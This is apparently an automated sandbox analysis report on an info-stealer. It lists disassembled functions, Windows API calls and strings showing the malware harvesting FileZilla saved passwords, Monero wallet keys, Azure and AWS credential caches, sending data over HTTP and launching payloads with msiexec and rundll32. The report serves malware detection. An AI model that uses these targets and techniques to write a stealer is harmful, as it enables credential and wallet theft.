                                    • Instruction ID: bd959919f4ccfdcaa1be3a8c6646ff35550a531f67e2829ba713eced9cb32286
                                    • Opcode Fuzzy Hash: 46ef6e441e1e9d310ea3f8e456257ab5871483ac03b62047433107fa46d1ca50
                                    • Instruction Fuzzy Hash: 3E3176F250C304AFE309BF29D88276AFBE5EF98310F16482CE2C583600E635A4508A87
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00FC0DBA,00FC0DB7,00FC0DB6,00FC0DB3), ref: 00FB0362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB0369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FB0385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FB03CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB03DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00FB0419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FB0463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00FB0562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00FB0571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00FB0580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB0593
                                    • lstrcat.KERNEL32(?,00FC1678), ref: 00FB05A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB05B5
                                    • lstrcat.KERNEL32(?,00FC167C), ref: 00FB05C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 00FB05D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB05E6
                                    • lstrcat.KERNEL32(?,00FC1688), ref: 00FB05F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00FB0604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB0617
                                    • lstrcat.KERNEL32(?,00FC1698), ref: 00FB0626
                                    • lstrcat.KERNEL32(?,00FC169C), ref: 00FB0635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 561a5d22d56efa85be2e71871e3f5f3d3c2d96d4a48d1a9c254d3ac163471def
                                    • Instruction ID: 19a5c98490496c6879688bd5f33b02ef09c4ca10e7500019ccd5e6fdb7ea1d8d
                                    • Opcode Fuzzy Hash: 561a5d22d56efa85be2e71871e3f5f3d3c2d96d4a48d1a9c254d3ac163471def
                                    • Instruction Fuzzy Hash: B8D12B71900208ABCB14EBE1DD96EEE7778FF54301F544428F112A7085EE78EA56EF61
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                      • Part of subcall function 00FA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FA59F8
                                    • StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA5A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA5B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008CE9F8,00000000,?,008CA940,00000000,?,00FC1A1C), ref: 00FA5E71
                                    • lstrlen.KERNEL32(00000000), ref: 00FA5E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FA5E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA5E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00FA5EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00FA5ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FA5EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00FA5F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FA5F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FA5F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA5FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA5FBD
                                    • HttpOpenRequestA.WININET(00000000,008CEA38,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA5BF8
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA5FC7
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: df0543b229df85bcadf3ea93e5fd270fed499508605ee03e0ca2d457ae2604ff
                                    • Instruction ID: 0a040d6c85451ae64afe4c23658c21358679b69b0fb39adb14484e727d60426f
                                    • Opcode Fuzzy Hash: df0543b229df85bcadf3ea93e5fd270fed499508605ee03e0ca2d457ae2604ff
                                    • Instruction Fuzzy Hash: 99122171820118BBDB19EBA1DC96FEEB378BF14700F5041A9B10677491EF346A49EF61
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FACF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FAD0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FAD0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD208
                                    • lstrcat.KERNEL32(?,00FC1478), ref: 00FAD217
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD22A
                                    • lstrcat.KERNEL32(?,00FC147C), ref: 00FAD239
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD24C
                                    • lstrcat.KERNEL32(?,00FC1480), ref: 00FAD25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD26E
                                    • lstrcat.KERNEL32(?,00FC1484), ref: 00FAD27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD290
                                    • lstrcat.KERNEL32(?,00FC1488), ref: 00FAD29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD2B2
                                    • lstrcat.KERNEL32(?,00FC148C), ref: 00FAD2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD2D4
                                    • lstrcat.KERNEL32(?,00FC1490), ref: 00FAD2E3
                                      • Part of subcall function 00FBA820: lstrlen.KERNEL32(00FA4F05,?,?,00FA4F05,00FC0DDE), ref: 00FBA82B
                                      • Part of subcall function 00FBA820: lstrcpy.KERNEL32(00FC0DDE,00000000), ref: 00FBA885
                                    • lstrlen.KERNEL32(?), ref: 00FAD32A
                                    • lstrlen.KERNEL32(?), ref: 00FAD339
                                      • Part of subcall function 00FBAA70: StrCmpCA.SHLWAPI(008C9170,00FAA7A7,?,00FAA7A7,008C9170), ref: 00FBAA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FAD3B4
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: bf75de317a80cb1fe2aa5aec927b27300d8f3ab4caf13078d37845c7883d3289
                                    • Instruction ID: 4851e9ad37736658879f102b311ff3e03d5698c07f2209603eff7e8160b96e08
                                    • Opcode Fuzzy Hash: bf75de317a80cb1fe2aa5aec927b27300d8f3ab4caf13078d37845c7883d3289
                                    • Instruction Fuzzy Hash: 2FE15D71910108ABCB18EBE1ED96EEE7778BF54301F104068F117B7091DE39AA59EF62
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008CD498,00000000,?,00FC144C,00000000,?,?), ref: 00FACA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FACA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00FACA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FACAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FACAD9
                                    • StrStrA.SHLWAPI(?,008CD4B0,00FC0B52), ref: 00FACAF7
                                    • StrStrA.SHLWAPI(00000000,008CD3D8), ref: 00FACB1E
                                    • StrStrA.SHLWAPI(?,008CDD60,00000000,?,00FC1458,00000000,?,00000000,00000000,?,008C90E0,00000000,?,00FC1454,00000000,?), ref: 00FACCA2
                                    • StrStrA.SHLWAPI(00000000,008CDB00), ref: 00FACCB9
                                      • Part of subcall function 00FAC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FAC871
                                      • Part of subcall function 00FAC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FAC87C
                                    • StrStrA.SHLWAPI(?,008CDB00,00000000,?,00FC145C,00000000,?,00000000,008C91F0), ref: 00FACD5A
                                    • StrStrA.SHLWAPI(00000000,008C8FE0), ref: 00FACD71
                                      • Part of subcall function 00FAC820: lstrcat.KERNEL32(?,00FC0B46), ref: 00FAC943
                                      • Part of subcall function 00FAC820: lstrcat.KERNEL32(?,00FC0B47), ref: 00FAC957
                                      • Part of subcall function 00FAC820: lstrcat.KERNEL32(?,00FC0B4E), ref: 00FAC978
                                    • lstrlen.KERNEL32(00000000), ref: 00FACE44
                                    • CloseHandle.KERNEL32(00000000), ref: 00FACE9C
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 50e48f85e149a37368dcc4d6ceb994ea5e09e6983af762bbfed34d05e69fda38
                                    • Instruction ID: c18e402114fa3d83d65a281eb92e967f93de3c18571697b95138a2f9835952bd
                                    • Opcode Fuzzy Hash: 50e48f85e149a37368dcc4d6ceb994ea5e09e6983af762bbfed34d05e69fda38
                                    • Instruction Fuzzy Hash: FEE1EB71D00108ABDB18EBE5DC92FEEB7B8AF54300F404169F11667591EF38AA4ADF61
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • RegOpenKeyExA.ADVAPI32(00000000,008CAFE8,00000000,00020019,00000000,00FC05B6), ref: 00FB83A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FB8426
                                    • wsprintfA.USER32 ref: 00FB8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FB847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB8499
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: ec6989de3229f6ff75c37167cfce7f473764d4dabdb21fbd13fd2cadee65699c
                                    • Instruction ID: 9599d70cf9adad2a3a97a5418eeed289f941017aa6f0d7103da4b276cba58437
                                    • Opcode Fuzzy Hash: ec6989de3229f6ff75c37167cfce7f473764d4dabdb21fbd13fd2cadee65699c
                                    • Instruction Fuzzy Hash: 4E810071910118ABDB28DB91DD95FEA77BCBF48700F008299E10AA6180DF75AF86DF90
                                    APIs
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00FB4DCD
                                      • Part of subcall function 00FB4910: wsprintfA.USER32 ref: 00FB492C
                                      • Part of subcall function 00FB4910: FindFirstFileA.KERNEL32(?,?), ref: 00FB4943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00FB4E59
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC0FDC), ref: 00FB4971
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC0FE0), ref: 00FB4987
                                      • Part of subcall function 00FB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FB4B7D
                                      • Part of subcall function 00FB4910: FindClose.KERNEL32(000000FF), ref: 00FB4B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FB4EE5
                                      • Part of subcall function 00FB4910: wsprintfA.USER32 ref: 00FB49B0
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC08D2), ref: 00FB49C5
                                      • Part of subcall function 00FB4910: wsprintfA.USER32 ref: 00FB49E2
                                      • Part of subcall function 00FB4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00FB4A1E
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,008CEB18), ref: 00FB4A4A
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,00FC0FF8), ref: 00FB4A5C
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,?), ref: 00FB4A70
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,00FC0FFC), ref: 00FB4A82
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,?), ref: 00FB4A96
                                      • Part of subcall function 00FB4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00FB4AAC
                                      • Part of subcall function 00FB4910: DeleteFileA.KERNEL32(?), ref: 00FB4B31
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: bc030e35e2db75941ee5b6d0c942a12abff8984592adf7805256c41ef3f1180d
                                    • Instruction ID: a80a106aadd60e93a223f362e94a01e6e549016fa864eb362ddd50018d13c9a3
                                    • Opcode Fuzzy Hash: bc030e35e2db75941ee5b6d0c942a12abff8984592adf7805256c41ef3f1180d
                                    • Instruction Fuzzy Hash: 7D41B6BA94020867DB24F7B0ED47FED3778AB65701F0044587185A60C2EEB89BD99F93
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FB906C
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: e22cb3702372cc771bf48b8ed91694968819f0ef1c9441912ffda07f6f21d89e
                                    • Instruction ID: c4298a47ff954252cfb045e3bb44db3cd2bf5b1e3deeb6c86cb812543349dc97
                                    • Opcode Fuzzy Hash: e22cb3702372cc771bf48b8ed91694968819f0ef1c9441912ffda07f6f21d89e
                                    • Instruction Fuzzy Hash: C871DBB5D10208ABDB14DFE4E889FEDB7B9BF48700F108518F615AB284DB74A945DB60
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB31C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB34EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 1ff6c452f12678ff0d1a4665775aa770ba57086918066a5d9ca5ec4cded1e7d3
                                    • Instruction ID: e2323205ac531fd3aa057574ef89be54af65dd972b2eab2fb6e3d027ed0c21f9
                                    • Opcode Fuzzy Hash: 1ff6c452f12678ff0d1a4665775aa770ba57086918066a5d9ca5ec4cded1e7d3
                                    • Instruction Fuzzy Hash: 27122271800108EADB19FBA1DC92FEDB778AF14300F544169F50676591EF386B4AEFA2
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA6280: InternetOpenA.WININET(00FC0DFE,00000001,00000000,00000000,00000000), ref: 00FA62E1
                                      • Part of subcall function 00FA6280: StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA6303
                                      • Part of subcall function 00FA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA6335
                                      • Part of subcall function 00FA6280: HttpOpenRequestA.WININET(00000000,GET,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA6385
                                      • Part of subcall function 00FA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FA63BF
                                      • Part of subcall function 00FA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FA63D1
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB5318
                                    • lstrlen.KERNEL32(00000000), ref: 00FB532F
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00FB5364
                                    • lstrlen.KERNEL32(00000000), ref: 00FB5383
                                    • lstrlen.KERNEL32(00000000), ref: 00FB53AE
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 6496872079f509ff13408201d94d4b73be834c4de03d3a7be56a34054993dafb
                                    • Instruction ID: 43234b2fe8217cc314fcf3af8fbd4cb8832cb5412acf43a43c5505c18be16f3b
                                    • Opcode Fuzzy Hash: 6496872079f509ff13408201d94d4b73be834c4de03d3a7be56a34054993dafb
                                    • Instruction Fuzzy Hash: DB510E70910148ABCB24FF61CDA2BED7779AF10301F504018F4066B592EF38AB55EF62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
